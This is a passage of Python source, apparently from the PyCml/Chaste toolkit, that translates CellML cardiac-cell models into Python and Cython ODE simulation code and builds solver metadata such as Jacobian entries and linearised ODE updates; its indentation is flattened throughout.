def output_variable(self, ci_elt, ode=False):
"""Output a ci element, i.e. a variable lookup."""
if hasattr(ci_elt, '_cml_variable') and ci_elt._cml_variable:
self.write(self.code_name(ci_elt.variable, ode=ode))
else:
# This ci element is in the solver_info section, thus
# doesn't have all the extra annotations. It is a fully
# qualified name though.
prefix = ['var_', 'd_dt_'][ode]
varname = unicode(ci_elt)
if varname[0] == '(':
# (compname,varname)
cname, vname = varname[1:-1].split(u',')
if self.single_component:
varname = vname
else:
varname = cname + '__' + vname
elif varname == u'delta_t':
# Special case for the timestep in ComputeJacobian
prefix = ''
varname = 'mDt'
else:
# var_cname__vname
varname = varname[4:]
self.write(self.shorten_name(prefix + varname))
return
class CellMLToPythonTranslator(CellMLToChasteTranslator):
"""Output code suitable for the Python implementation of Functional Curation."""
STMT_END = ''
COMMENT_START = '# '
DOXYGEN_COMMENT_START = '## '
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
TYPE_VOID = ''
TYPE_CONST_UNSIGNED = ''
TYPE_VECTOR = ''
TYPE_VECTOR_REF = ''
TRUE = 'True'
FALSE = 'False'
M_PI = 'math.pi'
M_E = 'math.e'
NOT_A_NUMBER = 'float("nan")'
USES_SUBSIDIARY_FILE = False
binary_ops = CellMLToChasteTranslator.binary_ops.copy()
binary_ops.update({'rem': '%'})
nary_ops = CellMLToChasteTranslator.nary_ops.copy()
nary_ops.update({'and': 'and', 'or': 'or'})
function_map = {'power': 'math.pow', 'abs': 'abs', 'ln': 'math.log', 'log': 'math.log', 'exp': 'math.exp',
'floor': 'math.floor', 'ceiling': 'math.ceil',
'factorial': 'factorial', # Needs external definition
'not': 'not',
'sin': 'math.sin', 'cos': 'math.cos', 'tan': 'math.tan',
'sec': '1/math.cos', 'csc': '1/math.sin', 'cot': '1/math.tan',
'sinh': 'math.sinh', 'cosh': 'math.cosh', 'tanh': 'math.tanh',
'sech': '1/math.cosh', 'csch': '1/math.sinh', 'coth': '1/math.tanh',
'arcsin': 'math.asin', 'arccos': 'math.acos', 'arctan': 'math.atan',
'arcsinh': 'math.asinh', 'arccosh': 'math.acosh', 'arctanh': 'math.atanh'}
special_roots = {2: 'math.sqrt'}
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.py'
def open_block(self, **kwargs):
"""Just increase indent; we assume the previous line included a colon."""
self.set_indent(offset=1)
def close_block(self, blank_line=True, **kwargs):
"""Decrease indent, and optionally add an extra blank line."""
self.set_indent(offset=-1)
if blank_line:
self.writeln(**kwargs)
return
def code_name(self, var, *args, **kwargs):
"""Return the full name of var in a form suitable for inclusion in a source file.
Overrides the base class version to access self.parameters for parameters.
"""
if hasattr(var, '_cml_param_index'):
return self.vector_index(self.param_vector_name, var._cml_param_index)
else:
return super(CellMLToPythonTranslator, self).code_name(var, *args, **kwargs)
def output_log(self, expr, paren):
"""Output a logarithm to the given base, which defaults to base 10."""
if hasattr(expr, u'logbase'):
# A base is provided.
self.output_function('math.log', list(expr.operands()) + [expr.logbase], paren)
else:
# Use base 10
self.output_function('math.log10', expr.operands(), paren)
def output_root(self, expr, paren):
"""Output a root taken to some degree.
If a degree qualifier element is not provided, uses default 2.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute x^(1/b)
self.write('math.pow(')
self.output_expr(expr.operands().next(), False)
self.write(', 1/')
self.output_expr(expr.degree, True)
self.write(')')
else:
# Compute square root
self.output_function('math.sqrt', expr.operands(), paren)
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
We use a cascading ternary if expression for simplicity.
"""
self.open_paren(paren)
for piece in getattr(expr, u'piece', []):
self.output_expr(child_i(piece, 1), True) # Result
self.write(' if ')
self.output_expr(child_i(piece, 2), True) # Condition
self.write(' else ')
if hasattr(expr, u'otherwise'):
self.output_expr(child_i(expr.otherwise, 1), True) # Default case
else:
self.write(self.NOT_A_NUMBER)
self.close_paren(paren)
def vector_create(self, vector, size):
"""Return code for creating a new vector with the given size."""
return ''.join(map(str, [vector, self.EQ_ASSIGN, 'np.zeros(', size, ')', self.STMT_END]))
def vector_initialise(self, vector, size):
"""Return code for creating an already-declared vector with the given size."""
return self.vector_create(vector, size)
def analyse_model(self):
"""Figure out protocol inputs & outputs of interest, and record details as member variables."""
assert self.use_protocol
# Single-valued outputs
self._outputs = cellml_metadata.find_variables(self.model,
('pycml:output-variable', NSS['pycml']),
'yes')
self._outputs.sort(key=lambda v: self.var_display_name(v))
# Vector-valued outputs
self._vector_outputs = {}
prop = ('pycml:output-vector', NSS['pycml'])
vector_names = set(cellml_metadata.get_targets(self.model, None,
cellml_metadata.create_rdf_node(prop)))
for name in vector_names:
vector_outputs = cellml_metadata.find_variables(self.model, prop, name)
assert len(vector_outputs) > 0
vector_outputs.sort(key=lambda v: self.var_display_name(v))
self._vector_outputs[name] = vector_outputs
# Find model parameters that can be set from the protocol
self.cell_parameters = filter(
lambda v: v.is_modifiable_parameter,
cellml_metadata.find_variables(self.model,
('pycml:modifiable-parameter', NSS['pycml']),
'yes'))
self.cell_parameters.sort(key=lambda v: self.var_display_name(v))
for i, var in enumerate(self.cell_parameters):
# Remember the var's index
var._cml_param_index = i
self.param_vector_name = 'self.parameters'
def output_common_imports(self):
"""Output imports common to both Python and Cython code."""
self.output_doxygen('@file\n\n',
'This source file was generated from CellML.\n\n',
'Model: ', self.model.name, '\n\n',
version_comment(self.add_timestamp),
'\n\n<autogenerated>')
self.writeln()
self.writeln('import numpy as np')
self.writeln()
self.writeln('import fc.simulations.model as Model')
self.writeln('import fc.utility.environment as Env')
self.writeln('import fc.language.values as V')
self.writeln()
def output_common_constructor_content(self):
"""Output __init__ content common to both Python and Cython code."""
self.writeln('self.freeVariableName = "', self.var_display_name(self.free_vars[0]), '"')
self.writeln('self.freeVariable = 0.0')
self.writeln(self.vector_create('self.state', len(self.state_vars)))
self.writeln('self.stateVarMap = {}')
self.writeln(self.vector_create('self.initialState', len(self.state_vars)))
input_names = set() # Check for duplicates
for i, var in enumerate(self.state_vars):
for name in self.get_ontology_names(var, no_names_ok=True):
if name in input_names:
raise ValueError('Duplicate input variable name "' + name + '" found')
input_names.add(name)
self.writeln('self.stateVarMap["', name, '"] = ', i)
init_val = getattr(var, u'initial_value', None)
init_comm = ' # ' + var.fullname() + ' ' + var.units
if init_val is None:
init_comm += '; value not given in model'
# Don't want compiler error, but shouldn't be a real number
init_val = self.NOT_A_NUMBER
self.writeln(self.vector_index('self.initialState', i), self.EQ_ASSIGN, init_val, init_comm)
self.writeln()
self.writeln('self.parameterMap = {}')
self.writeln(self.vector_create('self.parameters', len(self.cell_parameters)))
for var in self.cell_parameters:
for name in self.get_ontology_names(var):
if name in input_names:
raise ValueError('Duplicate input variable name "' + name + '" found')
input_names.add(name)
self.writeln('self.parameterMap["', name, '"] = ', var._cml_param_index)
self.writeln(self.vector_index('self.parameters', var._cml_param_index),
self.EQ_ASSIGN, var.initial_value, self.STMT_END, ' ',
self.COMMENT_START, var.fullname(), ' ', var.units)
# List outputs, and create objects for the GetOutputs method
self.writeln()
self.writeln('self.outputNames = []')
self.writeln('outputs = self._outputs = []')
output_names = set() # Check for duplicate local parts
for var in self._outputs:
# TODO: A later optimisation could look at which names the protocol actually uses, and only generate those.
for name in self.get_ontology_names(var):
if name in output_names:
raise ValueError('Duplicate output name "' + name + '" found')
output_names.add(name)
self.writeln('self.outputNames.append("', name, '")')
self.writeln('outputs.append(np.array(0.0))')
for name, vars in self._vector_outputs.iteritems():
if name in output_names:
raise ValueError('Duplicate output name "' + name + '" found')
output_names.add(name)
self.writeln('self.outputNames.append("', name, '")')
self.writeln('outputs.append(np.array([', ', '.join(['0.0'] * len(vars)), ']))')
self.writeln()
def output_top_boilerplate(self):
"""Output file content occurring before the model equations."""
self.analyse_model()
# Start file output
self.output_common_imports()
self.writeln('import math')
if self.options.numba:
self.writeln('import numba')
self.writeln('from numba import autojit, jit, void, double, object_')
self.writeln()
if self.options.numba:
self.writeln('@jit')
self.writeln('class ', self.class_name, '(Model.AbstractOdeModel):')
self.open_block()
# Constructor
if self.options.numba:
self.writeln('@void()')
self.writeln('def __init__(self):')
self.open_block()
self.output_common_constructor_content()
#2390 TODO: Units info
self.writeln('Model.AbstractOdeModel.__init__(self)')
self.close_block()
def output_state_assignments(self, nodeset, stateVectorName):
"""Assign state variables used by nodeset to local names."""
self.output_comment('State variables')
for i, var in enumerate(self.state_vars):
if var in nodeset:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(var), self.EQ_ASSIGN, self.vector_index(stateVectorName, i), self.STMT_END)
self.writeln()
def output_mathematics(self):
"""Output the mathematics in this model.
This just generates the ODE right-hand side function, EvaluateRhs(self, t, y)
"""
if self.options.numba:
self.writeln('@jit(double[:](object_, double, double[:], double[:]))')
self.writeln('def EvaluateRhs(self, ', self.code_name(self.free_vars[0]), ', y, ydot=np.empty(0)):')
self.open_block()
self.writeln('if ydot.size == 0:')
self.writeln(self.vector_create('ydot', len(self.state_vars)), indent_offset=1)
# Work out what equations are needed to compute the derivatives
derivs = set(map(lambda v: (v, self.free_vars[0]), self.state_vars))
nodeset = self.calculate_extended_dependencies(derivs)
# Code to do the computation
self.output_state_assignments(nodeset, 'y')
self.output_comment('Mathematics')
self.output_equations(nodeset)
self.writeln()
# Assign to derivatives vector
for i, var in enumerate(self.state_vars):
self.writeln(self.vector_index('ydot', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.writeln('return ydot')
self.close_block()
def output_bottom_boilerplate(self):
"""Output file content occurring after the model equations, i.e. the GetOutputs method."""
if self.options.numba:
self.writeln('@object_()')
self.writeln('def GetOutputs(self):')
self.open_block()
self.output_get_outputs_content()
self.close_block()
def get_ontology_names(self, var, no_names_ok=False):
"""Get the local names of this variable within any ontology annotations.
We look at all annotations of this variable using bqbiol:is, and if any of them occur within namespaces mapped
in the protocol, we extract the local part of the annotation URI, after the base defined by the protocol.
Returns a list of such names, raising an error if none exist, unless no_names_ok is True.
"""
names = []
name_uris = var.get_rdf_annotations(('bqbiol:is', NSS['bqbiol']))
for name_uri in name_uris:
# Iterate through possible URI bases to find which this one is part of
for uri_base in self.model._cml_protocol_namespaces.itervalues():
local_part = cellml_metadata.namespace_member(name_uri, uri_base, wrong_ns_ok=True)
if local_part:
names.append(local_part)
break # No other bases possible for this URI
if not names and not no_names_ok:
raise ValueError('No suitable name annotations found for variable ' + str(var))
return names
def output_get_outputs_content(self):
"""Output the content and open/close block for the GetOutputs method."""
# Figure out what equations are needed to compute the outputs
output_vars = set(self._outputs)
for vars in self._vector_outputs.itervalues():
output_vars.update(vars)
nodeset = self.calculate_extended_dependencies(output_vars)
# Do the calculations
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.free_vars[0]), self.EQ_ASSIGN, 'self.freeVariable')
self.output_state_assignments(nodeset, 'self.state')
self.output_comment('Mathematics computing outputs of interest')
self.output_equations(nodeset)
self.writeln()
# Put the results in a list to be returned to the caller
self.writeln('outputs = self._outputs')
output_count = 0
for var in self._outputs:
# TODO: A later optimisation could look at which names the protocol actually uses, and only generate those.
for name in self.get_ontology_names(var):
self.writeln('outputs[', output_count, '][()] = ', self.code_name(var))
output_count += 1
for name, vars in self._vector_outputs.iteritems():
for i, var in enumerate(vars):
self.writeln('outputs[', output_count, '][', i, '] = ', self.code_name(var))
output_count += 1
self.writeln('return outputs')
self.close_block()
class CellMLToCythonTranslator(CellMLToPythonTranslator):
"""Output Cython code suitable for the Python implementation of Functional Curation.
Unlike the base class, code generated by this translator can't inherit from a pure Python base class.
It also hardcodes using our Cython wrapper of CVODE as the solver.
Note that we use 2 types of vector in the generated code: numpy arrays with the same names as for
CellMLToPythonTranslator provide the same interface to the FC python code, and N_Vector views on the
same memory provide fast access for the ODE solver.
"""
USES_SUBSIDIARY_FILE = True
# TYPE_VECTOR = 'cdef Sundials.N_Vector'
# TYPE_VECTOR_REF = 'cdef Sundials.N_Vector'
TYPE_DOUBLE = 'cdef double '
TYPE_CONST_DOUBLE = 'cdef double '
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.pyx'
def subsidiary_file_name(self, output_filename):
"""Our subsidiary file is the setup.py used to build the extension."""
return output_filename, os.path.join(os.path.dirname(output_filename), 'setup.py')
# def vector_index(self, vector, i):
# """Return code for accessing the i'th index of vector."""
# return '(<Sundials.N_VectorContent_Serial>(' + vector + ').content).data[' + str(i) + ']'
#
# def vector_create(self, vector, size):
# """Return code for creating a new vector with the given size."""
# return ''.join(map(str, [self.TYPE_VECTOR, vector, self.EQ_ASSIGN,
# 'Sundials.N_VNew_Serial(', size, ')', self.STMT_END]))
#
# def vector_initialise(self, vector, size):
# """Return code for creating an already-declared vector with the given size."""
# return ''.join(map(str, [vector, self.EQ_ASSIGN, 'Sundials.N_VNew_Serial(', size, ')', self.STMT_END]))
def output_assignment(self, expr):
"""Output an assignment statement.
Avoids most of the magic in the Chaste version of this method, except for handling parameters specially.
"""
if isinstance(expr, cellml_variable) and expr in self.cell_parameters:
return
return CellMLTranslator.output_assignment(self, expr)
def output_top_boilerplate(self):
"""Output file content occurring before the model equations: basically just imports in this case.
The main RHS 'method' is actually a plain function so we can use it as a C callback.
"""
self.analyse_model()
self.write_setup_py()
# Start file output
self.writeln('# cython: profile=True')
self.output_common_imports()
self.writeln('cimport libc.math as math')
self.writeln('cimport numpy as np')
self.writeln('import os')
self.writeln('import shutil')
self.writeln('import sys')
self.writeln()
self.writeln('from fc.sundials.solver cimport CvodeSolver')
self.writeln('cimport fc.sundials.sundials as Sundials')
self.writeln('from fc.utility.error_handling import ProtocolError')
self.writeln()
def output_bottom_boilerplate(self):
"""Output file content occurring after the model equations, i.e. the model class."""
base_class = 'CvodeSolver'
self.writeln('cdef class ', self.class_name, '(', base_class, '):')
self.open_block()
# Declare member attributes. Note that state and _state come from the base class.
self.writeln('cdef public char* freeVariableName')
self.writeln('cdef public double freeVariable')
self.writeln('cdef public object stateVarMap')
self.writeln('cdef public np.ndarray initialState')
self.writeln('cdef public object parameterMap')
self.writeln('cdef public np.ndarray parameters')
self.writeln('cdef public object outputNames')
self.writeln()
self.writeln('cdef public object savedStates')
self.writeln('cdef public object env')
self.writeln('cdef public bint dirty')
self.writeln('cdef public char* outputPath')
self.writeln('cdef public object indentLevel')
self.writeln()
self.writeln('cdef public object _module')
self.writeln('cdef public object simEnv')
self.writeln()
self.writeln('cdef Sundials.N_Vector _parameters')
self.writeln('cdef public object _outputs')
self.writeln()
# Constructor
self.writeln('def __init__(self):')
self.open_block()
self.output_common_constructor_content()
self.writeln('self.state = self.initialState.copy()')
self.writeln('self.savedStates = {}')
self.writeln('self.dirty = False')
self.writeln('self.indentLevel = 0')
self.writeln('self.AssociateWithModel(self)')
self.writeln('self._parameters = Sundials.N_VMake_Serial(len(self.parameters), <Sundials.realtype*>(<np.ndarray>self.parameters).data)')
# TODO: Use a separate environment for each ontology
self.writeln('self.env = Env.ModelWrapperEnvironment(self)')
# Initialise CVODE
self.close_block()
self.writeln('def SetRhsWrapper(self):')
self.open_block()
self.writeln('flag = Sundials.CVodeInit(self.cvode_mem, _EvaluateRhs, 0.0, self._state)')
self.writeln('self.CheckFlag(flag, "CVodeInit")')
self.close_block()
# Cython-level destructor
self.writeln('def __dealloc__(self):')
self.open_block()
self.writeln('if self._parameters != NULL:')
self.writeln(' Sundials.N_VDestroy_Serial(self._parameters)')
self.close_block()
# Methods to match the AbstractModel class
self.writeln('def SetOutputFolder(self, path):')
self.open_block()
self.writeln("if os.path.isdir(path) and path.startswith('/tmp'):")
self.writeln('shutil.rmtree(path)', indent_offset=1)
self.writeln('os.mkdir(path)')
self.writeln('self.outputPath = path')
self.close_block()
self.writeln('def SetIndentLevel(self, indentLevel):')
self.open_block()
self.writeln('self.indentLevel = indentLevel')
self.close_block()
# Methods to match the AbstractOdeModel class
self.writeln('def SetSolver(self, solver):')
self.open_block()
self.writeln('print >>sys.stderr, " " * self.indentLevel, "SetSolver: Models implemented using Cython contain a built-in ODE solver, so ignoring setting."')
self.close_block()
self.writeln('def GetEnvironmentMap(self):')
self.open_block()
self.writeln('return {', nl=False)
# TODO: Use a separate env for each ontology
for i, prefix in enumerate(self.model._cml_protocol_namespaces.iterkeys()):
if i > 0:
self.write(', ')
self.write("'%s': self.env" % prefix)
self.writeln('}', indent=False)
self.close_block()
self.writeln('cpdef SetFreeVariable(self, double t):')
self.open_block()
self.writeln('self.freeVariable = t')
self.writeln(base_class, '.SetFreeVariable(self, t)')
self.close_block()
self.writeln('def SaveState(self, name):')
self.open_block()
self.writeln('self.savedStates[name] = self.state.copy()')
self.close_block()
self.writeln('cpdef ResetState(self, name=None):')
self.open_block()
self.writeln('if name is None:')
self.writeln(base_class, '.ResetSolver(self, self.initialState)', indent_offset=1)
self.writeln('else:')
self.writeln(base_class, '.ResetSolver(self, self.savedStates[name])', indent_offset=1)
self.close_block()
self.writeln('cpdef GetOutputs(self):')
self.open_block()
self.writeln('cdef np.ndarray[Sundials.realtype, ndim=1] parameters = self.parameters')
self.param_vector_name = 'parameters'
self.output_get_outputs_content()
self.param_vector_name = 'self.parameters'
self.close_block()
def output_mathematics(self):
"""Output the mathematics in this model.
This generates the ODE right-hand side function, "EvaluateRhs(self, t, y)", but as a C-style callback for CVODE.
"""
self.writeln('cdef int _EvaluateRhs(Sundials.realtype ', self.code_name(self.free_vars[0]),
', Sundials.N_Vector y, Sundials.N_Vector ydot, void* user_data):')
self.open_block()
self.writeln('model = <object>user_data')
self.writeln('cdef np.ndarray[Sundials.realtype, ndim=1] parameters = <np.ndarray>model.parameters')
self.param_vector_name = 'parameters'
# Work out what equations are needed to compute the derivatives
derivs = set(map(lambda v: (v, self.free_vars[0]), self.state_vars))
nodeset = self.calculate_extended_dependencies(derivs)
# Code to do the computation
self.output_comment('State variables')
for i, var in enumerate(self.state_vars):
if var in nodeset:
self.writeln(self.TYPE_DOUBLE, self.code_name(var), ' = (<Sundials.N_VectorContent_Serial>y.content).data[', i, ']')
self.writeln()
self.output_comment('Mathematics')
self.output_equations(nodeset)
self.writeln()
# Assign to derivatives vector
for i, var in enumerate(self.state_vars):
self.writeln('(<Sundials.N_VectorContent_Serial>ydot.content).data[', i, '] = ', self.code_name(var, True))
self.param_vector_name = 'self.parameters'
self.close_block()
def write_setup_py(self):
"""Write our subsidiary setup.py file for building the extension."""
self.out2.write("""
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy
ext_modules=[
Extension("%(filebase)s",
["%(filebase)s.pyx"],
include_dirs=[numpy.get_include(), '%(fcpath)s'],
#library_dirs=['%(fcpath)s/fc/sundials'],
libraries=['sundials_cvode', 'sundials_nvecserial', 'm'])
# users can set CFLAGS and LDFLAGS in their env if needed
]
setup(
name = "%(filebase)s",
cmdclass = {"build_ext": build_ext},
ext_modules = ext_modules
)
""" % {'filebase': os.path.splitext(os.path.basename(self.output_filename))[0],
'fcpath': os.path.join(os.path.dirname(__file__), '../../projects/FunctionalCuration/src/python')})
###############################################
# Register translation classes in this module #
###############################################
CellMLTranslator.register(CellMLTranslator, 'C++')
CellMLTranslator.register(CellMLToChasteTranslator, 'Chaste')
CellMLTranslator.register(CellMLToCvodeTranslator, 'CVODE')
CellMLTranslator.register(CellMLToMapleTranslator, 'Maple')
CellMLTranslator.register(CellMLToMatlabTranslator, 'Matlab')
CellMLTranslator.register(CellMLToHaskellTranslator, 'Haskell')
CellMLTranslator.register(CellMLToPythonTranslator, 'Python')
CellMLTranslator.register(CellMLToCythonTranslator, 'Cython')
class SolverInfo(object):
"""Add information for specialised translator classes into a model."""
def __init__(self, model, force=False):
"""Add information for the solvers as XML.
The Jacobian and linearity analyses store their results in
Python data structures as attributes of this object.
Transcribe these into XML in a child <solver_info> element.
If any of these elements exist in the model they will be left
unaltered, unless force is set to True.
This constructor just sets up the container element; call one
of the add_* methods to actually add the information to it.
"""
self._model = model
if force and hasattr(model, u'solver_info'):
model.xml_remove_child(model.solver_info)
if hasattr(model, u'solver_info'):
solver_info = model.solver_info
else:
solver_info = model.xml_create_element(u'solver_info', NSS[u'solver'])
model.xml_append(solver_info)
self._solver_info = solver_info
self._component = None
self._dt = None
def add_all_info(self):
"""Actually add the info."""
self.add_transmembrane_potential_name()
self.add_membrane_ionic_current()
self.add_linearised_odes()
self.add_jacobian_matrix()
self.add_dt_reference()
def add_dt_reference(self):
"""Add a reference to the variable representing dt."""
solver_info = self._solver_info
model = self._model
if not hasattr(solver_info, u'dt'):
dt = self.get_dt()
elt = model.xml_create_element(u'dt', NSS[u'solver'], content=dt.fullname(cellml=True))
solver_info.xml_append(elt)
self._model._add_sorted_assignment(dt)
def add_transmembrane_potential_name(self):
"""The name of the transmembrane potential."""
solver_info = self._solver_info
model = self._model
if not hasattr(solver_info, u'transmembrane_potential'):
v_elt = model.xml_create_element(
u'transmembrane_potential', NSS[u'solver'],
content=model._cml_transmembrane_potential.fullname())
solver_info.xml_append(v_elt)
def add_linearised_odes(self):
"""Linearised ODEs - where du/dt = g + hu (and g, h are not functions of u).
Structure looks like:
<linear_odes>
<math>
<apply><eq/>
<apply><diff/>
<bvar><ci>t</ci></bvar>
<ci>u</ci>
</apply>
<apply><plus/>
g
<apply><times/>
h
<ci>u</ci>
</apply>
</apply>
</apply>
.
.
.
</math>
</linear_odes>
"""
solver_info = self._solver_info
model = self._model
if not hasattr(solver_info, u'linear_odes') and model._cml_linear_update_exprs:
odes_elt = model.xml_create_element(u'linear_odes', NSS[u'solver'])
solver_info.xml_append(odes_elt)
odes_math = model.xml_create_element(u'math', NSS[u'm'])
odes_elt.xml_append(odes_math)
linear_vars = model._cml_linear_update_exprs.keys()
linear_vars.sort(key=lambda v: v.fullname())
free_var = model._cml_free_var
for var in linear_vars:
g, h = model._cml_linear_update_exprs[var]
hu = mathml_apply.create_new(model, u'times', [h, var.fullname()])
rhs = mathml_apply.create_new(model, u'plus', [g, hu])
odes_math.xml_append(mathml_diff.create_new(
model, free_var.fullname(), var.fullname(), rhs))
# Ensure that the model has a special component
self._get_special_component()
def _fix_jac_var_name(self, vname):
"""
If PE will be performed on a model with a single component, then we'll need full names in
the variable attributes.
"""
if vname[:4] == 'var_' and len(self._model.component) == 1 and not self._model.component.ignore_component_name:
name = unicode('var_' + self._model.component.name + '__' + vname[4:])
else:
name = unicode(vname)
return name
def add_jacobian_matrix(self):
"""Jacobian matrix elements.
Structure looks like:
<jacobian>
[<math> assignments of common sub-terms </math>]
<entry var_i='varname' var_j='varname'>
<math> apply|cn|ci ...</math>
</entry>
</jacobian>
"""
solver_info = self._solver_info
model = self._model
if model._cml_jacobian and model._cml_jacobian_full:
jac = model._cml_jacobian[1]
else:
# Old-style partial jacobian, or no jacobian
jac = model._cml_jacobian
if not hasattr(solver_info, u'jacobian') and jac:
jac_elt = model.xml_create_element(u'jacobian', NSS[u'solver'])
solver_info.xml_append(jac_elt)
if model._cml_jacobian_full:
# There may be temporaries
temporaries = model._cml_jacobian[0]
if temporaries:
jac_elt.xml_append(amara_parse_cellml(temporaries).math)
jac_vars = jac.keys()
jac_vars.sort() # Will sort by variable name
for v_i, v_j in jac_vars:
# Add (i,j)-th entry
attrs = {u'var_i': self._fix_jac_var_name(v_i),
u'var_j': self._fix_jac_var_name(v_j)}
entry = model.xml_create_element(u'entry', NSS[u'solver'], attributes=attrs)
jac_elt.xml_append(entry)
entry_doc = amara_parse_cellml(jac[(v_i, v_j)].xml())
entry.xml_append(entry_doc.math)
# Ensure that the model has a special component
self._get_special_component()
return
def use_canonical_variable_names(self):
"""
PE has just been performed, so we need to update variable names occurring outside
the modifiable mathematics sections.
"""
jac_elt = getattr(self._solver_info, u'jacobian', None)
for entry in getattr(jac_elt, u'entry', []):
for vlabel in ['var_i', 'var_j']:
vname = getattr(entry, vlabel)
var = self._get_variable(vname)
new_name = var.get_source_variable(recurse=True).fullname()
setattr(entry, vlabel, new_name)
dt_elt = getattr(self._solver_info, u'dt', None)
if dt_elt:
var = self._get_variable(unicode(dt_elt))
new_name = var.get_source_variable(recurse=True).fullname()
dt_elt.xml_remove_child(unicode(dt_elt))
dt_elt.xml_append(unicode(new_name))
def add_membrane_ionic_current(self):
"""Add ionic current information as XML for solvers to use."""
solver_info = self._solver_info
model = self._model
# The total ionic current. This relies on having a configuration store.
if hasattr(model.xml_parent, '_cml_config') and not hasattr(solver_info, u'ionic_current'):
conf = model.xml_parent._cml_config
if conf.i_ionic_vars:
ionic_elt = model.xml_create_element(u'ionic_current', NSS[u'solver'])
# Adds each ionic var to the xml doc from the config store
for var in conf.i_ionic_vars:
varelt = model.xml_create_element(u'var', NSS[u'solver'],
content=var.fullname())
ionic_elt.xml_append(varelt)
solver_info.xml_append(ionic_elt)
return
def add_linear_ode_update_equations(self):
"""Add the update equations for the linear ODEs.
A linear ODE has the form du/dt = g+h.u where g & h are not functions of u. The
update expression then looks like u = (u + g.dt)/(1 - h.dt).
This replaces the linear_odes block with the structure:
<linear_odes>
<math>
<ci>u</ci>
<ci>t</ci>
<apply> <!-- (u + g.dt)/(1 - h.dt) --> </apply>
</math>
.
.
.
</linear_odes>
"""
block = getattr(self._solver_info, u'linear_odes', None)
dt = self._model.get_config().dt_variable.fullname() # was dt = u'delta_t'
# Add the new equations
for u, t, gh in self.get_linearised_odes():
g, h = gh
g.safe_remove_child(g, g.xml_parent)
g_dt = mathml_apply.create_new(block, u'times', [g, dt])
numer = mathml_apply.create_new(block, u'plus', [u.fullname(), g_dt])
h.safe_remove_child(h, h.xml_parent)
h_dt = mathml_apply.create_new(block, u'times', [h, dt])
denom = mathml_apply.create_new(block, u'minus', [(u'1', u'dimensionless'), h_dt])
eqn = mathml_apply.create_new(block, u'divide', [numer, denom])
math = block.xml_create_element(u'math', NSS[u'm'])
math.xml_append(mathml_ci.create_new(block, u.fullname()))
math.xml_append(mathml_ci.create_new(block, t.fullname()))
math.xml_append(eqn)
block.xml_append(math)
self._add_variable_links(math)
# Remove the old equations (first math element)
block.xml_remove_child(block.math)
def add_variable_links(self):
"""Link ci elements in the added XML to cellml_variable objects.
This analyses the names in the ci elements to determine which variable in
the model they refer to.
"""
self._process_mathematics(self._add_variable_links)
#1795 - classify temporary variables for the Jacobian matrix, and append
# to the main list of assignments in the model
solver_info = self._solver_info
if hasattr(solver_info, u'jacobian') and hasattr(solver_info.jacobian, u'math'):
for elt in solver_info.jacobian.math.apply:
elt.classify_variables(root=True)
for elt in solver_info.jacobian.math.apply:
self._model.topological_sort(elt)
#2418 - check if any state variables have been units-converted
self._check_state_var_units_conversions()
def _check_state_var_units_conversions(self):
"""Check if any Jacobian entries need to be altered because the units of state variables have changed.
If any variable considered a state variable by the Jacobian is now of type Computed then it has been
converted. We figure out the conversion factor, update the Jacobian to reference the new state variable,
and units-convert the derivative.
"""
if not hasattr(self._solver_info, u'jacobian'):
return
# Helper methods
def set_var_values(elt, vars=None):
"""Fake all variables appearing in the given expression being set to 1.0, and return them."""
if vars is None:
vars = []
if isinstance(elt, mathml_ci):
elt.variable.set_value(1.0)
vars.append(elt.variable)
else:
for child in getattr(elt, 'xml_children', []):
set_var_values(child, vars)
return vars
# Find any converted state variables
converted_state_vars = set()
for entry in getattr(self._solver_info.jacobian, u'entry', []):
var = self._get_variable(entry.var_i)
if var.get_type() == VarTypes.Computed:
converted_state_vars.add(var)
if not converted_state_vars:
return
# Figure out the conversion factor in each case
state_var_map = {}
for var in converted_state_vars:
defn = var.get_dependencies()[0]
defn_vars = set_var_values(defn.eq.rhs)
assert len(defn_vars) == 1, "Unexpected form of units conversion expression found"
factor = defn.eq.rhs.evaluate()
state_var_map[var] = (defn_vars[0], factor)
defn_vars[0].unset_values()
# Apply the conversion to relevant Jacobian entries
for entry in getattr(self._solver_info.jacobian, u'entry', []):
factor = 1
var_i = self._get_variable(entry.var_i)
if var_i in converted_state_vars:
var_i, factor_i = state_var_map[var_i]
var_i = var_i.get_source_variable(recurse=True)
entry.var_i = unicode(var_i.fullname())
factor /= factor_i
var_j = self._get_variable(entry.var_j)
if var_j in converted_state_vars:
var_j, factor_j = state_var_map[var_j]
var_j = var_j.get_source_variable(recurse=True)
entry.var_j = unicode(var_j.fullname())
factor *= factor_j
if factor != 1:
# Replace rhs with rhs * factor
rhs = list(entry.math.xml_element_children())[0]
entry.math.safe_remove_child(rhs)
new_rhs = mathml_apply.create_new(entry, 'times', [(factor, 'dimensionless'), rhs])
entry.math.xml_append(new_rhs)
def do_binding_time_analysis(self):
"""Do a binding time analysis on the additional mathematics.
This requires self.add_variable_links to have been called already.
"""
self._process_mathematics(lambda elt: elt._get_binding_time())
def _process_mathematics(self, func):
"""Apply func to each top-level mathematical construct in the solver info blocks.
func must be able to accept mathml_piecewise, mathml_apply, mathml_ci and mathml_cn elements.
"""
solver_info = self._solver_info
# Jacobian
if hasattr(solver_info, u'jacobian'):
if hasattr(solver_info.jacobian, u'math'):
for elt in solver_info.jacobian.math.apply:
func(elt)
for entry in solver_info.jacobian.entry:
for elt in entry.math.xml_element_children():
func(elt)
# Linearised ODEs
if hasattr(solver_info, u'linear_odes'):
for math in solver_info.linear_odes.math:
for elt in math.xml_element_children():
func(elt)
def has_modifiable_mathematics(self):
"""Check if the solver info blocks contain any modifiable mathematics."""
try:
self.get_modifiable_mathematics().next()
return True
except StopIteration:
return False
def get_modifiable_mathematics(self):
"""Get an iterable over mathematical constructs in the solver info blocks that can be changed.
Returned elements will be mathml_piecewise, mathml_apply, mathml_ci or mathml_cn instances.
"""
solver_info = self._solver_info
# Jacobian - entry definitions and temporaries can be changed
if hasattr(solver_info, u'jacobian'):
if hasattr(solver_info.jacobian, u'math'):
